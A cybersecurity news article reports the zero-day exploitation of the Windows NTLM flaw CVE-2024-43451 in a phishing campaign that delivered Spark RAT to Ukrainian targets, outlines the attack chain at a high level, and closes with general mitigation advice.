Hackers Exploit Windows NTLM Flaw to Spread RAT Malware

Cybersecurity researchers have discovered that a vulnerability in Windows NT LAN Manager (NTLM), tracked as CVE-2024-43451, has been actively exploited as a zero-day in targeted cyberattacks. The flaw, with a CVSS score of 6.5, was patched by Microsoft earlier this week but had already been abused in attacks linked to a suspected Russian-affiliated threat group.

The vulnerability is a spoofing issue that allows attackers to steal a user’s NTLMv2 hash with minimal interaction. Actions as simple as selecting, right-clicking, or moving a malicious file could trigger the exploit, according to a recent advisory.

Reports from cybersecurity researchers revealed that this flaw had been exploited since June 2024 as part of a phishing campaign delivering the open-source Spark RAT malware. The attackers hosted malicious files on a legitimate Ukrainian government website, specifically one designed to provide academic certificates.

The attack begins with phishing emails sent from a compromised Ukrainian government server. These emails prompt recipients to renew their academic certificates and include a booby-trapped URL. Clicking the link downloads a ZIP archive containing a malicious .URL file.

The exploit is triggered when the victim interacts with the file, establishing a connection with a remote server to retrieve additional malware, including the Spark RAT. In some cases, the attack also attempts to transmit the victim’s NTLM hash via the SMB protocol, enabling the attacker to perform a Pass-the-Hash attack.

This technique allows unauthorized access to a system by impersonating the user associated with the stolen hash without needing their password.

CERT-UA has noted a parallel campaign using tax-themed phishing emails to distribute LiteManager, a legitimate remote desktop tool, for financial theft. These attacks, attributed to UAC-0050, target accountants and enterprise users working with remote banking systems. Alarmingly, funds have reportedly been stolen within an hour of the initial compromise.

To mitigate such risks, organizations should ensure all systems are updated with the latest patches, particularly for NTLM-related vulnerabilities. Implementing robust email filtering, multi-factor authentication, and endpoint detection systems can further reduce exposure to phishing campaigns. Educating employees on recognizing phishing attempts and avoiding interaction with unknown or suspicious links is essential.